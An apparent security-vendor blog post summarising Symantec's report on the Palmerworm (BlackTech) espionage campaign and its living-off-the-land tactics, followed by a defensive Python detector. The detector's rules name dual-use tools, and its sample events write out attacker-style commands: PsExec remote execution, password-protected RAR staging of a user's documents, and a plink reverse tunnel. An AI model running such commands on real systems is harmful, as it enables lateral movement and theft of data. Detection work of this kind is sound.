Researchers at Symantec have identified a new campaign by the group known as Palmerworm, also tracked as BlackTech. The group has been active since at least 2013 but has never been formally attributed to a country. The attacks target organizations in the US, Japan, China, and Taiwan and are aimed at stealing information. The threat actor relied on living-off-the-land tactics, using legitimate software and tools already present on the operating system so that its activity blends in with normal administration and evades signature-based detection. In earlier campaigns the group used spear-phishing to gain a foothold, but in this most recent campaign the initial infection vector has not been identified. The malware used in this campaign had not previously been seen from this actor; researchers linked the activity to Palmerworm through infrastructure that has been tied to the group in the past and through its use of dual-use tools, a pattern also seen in its earlier operations.
The group has shifted tactics compared with previous incidents, relying more heavily on publicly available tools rather than only on malware it developed itself. This lets the group remain undetected for longer, and it also makes attribution harder for researchers, since anyone can obtain the same tools. The goal of the campaign has been to steal information from companies in several countries, across industries ranging from media outlets to finance and many other sectors. Symantec has not tied the group to any one nation-state. Taiwanese officials have previously stated that they believe the group works on behalf of the Chinese government. Some of the victims are located in China, which leads many to conclude that it is not a Chinese-backed actor, but China has targeted organizations inside its own borders before. As with most espionage campaigns, companies should have baseline monitoring in place, such as Binary Defense's Managed Detection and Response service, that can identify an intrusion even when the attackers are using legitimate software that basic anti-virus will not flag. With living-off-the-land tradecraft the signal is not the binary itself but the context in which it runs: who launched it, from where, with what arguments, and what else happened on the host around the same time.
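As an added example of what that monitoring has to key on, here is a small Python detector that runs over constructed Sysmon-style process-creation events. This is illustrative code written for this summary, not Symantec's or Binary Defense's, and the tool names, rule patterns, time window and sample events are assumptions for the example rather than indicators taken from the Palmerworm report. The detector treats dual-use binaries as benign on their own and only alerts when several distinct living-off-the-land behaviours cluster on one host within a short window.

```python
"""Toy living-off-the-land (LOTL) detector over constructed process-creation events.

Added example, not Symantec's or Binary Defense's code. The tool names, rule
patterns, thresholds and sample events below are assumptions for illustration,
not indicators taken from the Palmerworm report.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime
    host: str
    user: str
    parent: str   # parent process image name
    image: str    # full path of the launched executable
    cmdline: str


# (category, image pattern, command-line pattern). The image alone is never the
# alert: every tool here is legitimate. The command line supplies the context
# that separates routine admin use from staging, lateral movement or tunnelling.
RULES = [
    ("archive_staging", r"(rar|winrar|7z)\.exe$",
     r'(?i)\.exe"?\s+a\s.*?(\\temp\\|\\programdata\\|\\public\\)'),  # add-to-archive into a drop dir
    ("remote_exec", r"(psexec|psexesvc|wmic)\.exe$",
     r"(?i)(\\\\\S+|process call create)"),                         # targets a remote host
    ("tunnel", r"(plink|putty)\.exe$",
     r"(?i)\s-(R|L)\s*\d+"),                                         # SSH port forwarding
    ("recon", r"(^|\\)(net|nltest|nslookup)\.exe$",
     r"(?i)(\bview\b|/domain_trusts|/dclist|-type=srv)"),           # domain enumeration
]


def match_rules(ev: ProcEvent) -> list[str]:
    """Return the LOTL categories an event satisfies (image AND command line)."""
    return [name for name, img_re, cmd_re in RULES
            if re.search(img_re, ev.image, re.IGNORECASE) and re.search(cmd_re, ev.cmdline)]


def correlate(events, window=timedelta(hours=1), min_categories=2):
    """Alert when one host shows >= min_categories distinct LOTL categories
    within `window`. One PsExec or WinRAR run is ordinary admin activity; several
    different categories clustered on a host is the behaviour worth a look.
    Returns (host, window start, sorted categories) tuples."""
    hits = sorted((ev.ts, cat, ev.host) for ev in events for cat in match_rules(ev))
    by_host: dict[str, list] = {}
    for ts, cat, host in hits:
        by_host.setdefault(host, []).append((ts, cat))
    alerts = []
    for host, items in by_host.items():
        for ts, _ in items:
            cats = {c for t, c in items if ts <= t <= ts + window}
            if len(cats) >= min_categories:
                alerts.append((host, ts, sorted(cats)))
                break  # first qualifying window per host is enough here
    return alerts


def _t(hhmm: str) -> datetime:
    return datetime(2020, 9, 24, int(hhmm[:2]), int(hhmm[2:]))


# Constructed sample telemetry (Sysmon-style process creation), not real logs.
SAMPLE_EVENTS = [
    ProcEvent(_t("0900"), "WS01", "CORP\\jdoe", "cmd.exe",
              "C:\\Windows\\System32\\net.exe", "net view /domain"),
    ProcEvent(_t("0920"), "WS01", "CORP\\jdoe", "cmd.exe",
              "C:\\Tools\\PsExec.exe", "PsExec.exe \\\\FS01 -s cmd.exe /c whoami"),
    ProcEvent(_t("0940"), "WS01", "CORP\\jdoe", "cmd.exe",
              "C:\\Program Files\\WinRAR\\Rar.exe",
              'Rar.exe a -hpS3cret C:\\ProgramData\\upd.rar "C:\\Users\\jdoe\\Documents"'),
    ProcEvent(_t("1005"), "WS01", "CORP\\jdoe", "cmd.exe",
              "C:\\Tools\\plink.exe", "plink.exe -N -R 3389:127.0.0.1:3389 ops@203.0.113.5"),
    # Ordinary admin use on another host: a single category, so no alert.
    ProcEvent(_t("1100"), "ADMIN01", "CORP\\admin", "powershell.exe",
              "C:\\Tools\\PsExec.exe", "PsExec.exe \\\\WS07 -s ipconfig /all"),
    # Extracting an archive (command x, not a) matches nothing.
    ProcEvent(_t("1130"), "WS02", "CORP\\bob", "explorer.exe",
              "C:\\Program Files\\WinRAR\\WinRAR.exe",
              "WinRAR.exe x C:\\Users\\bob\\Downloads\\report.rar"),
]


if __name__ == "__main__":
    for host, start, cats in correlate(SAMPLE_EVENTS):
        print(f"ALERT host={host} from={start:%H:%M} categories={cats}")
```

On the constructed events only WS01 trips the detector: recon, remote execution and archive staging all occur there inside one hour, while the lone PsExec run on ADMIN01 and the archive extraction on WS02 stay silent. In a real deployment the individual rules would live in the EDR or a Sigma rule set and the window and threshold need tuning against each environment's administrative baseline; the transferable point is the host-level correlation of legitimate tools, not the particular regexes.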
More can be read here: https://www.zdnet.com/article/these-hackers-have-spent-months-hiding-out-in-company-networks-undetected/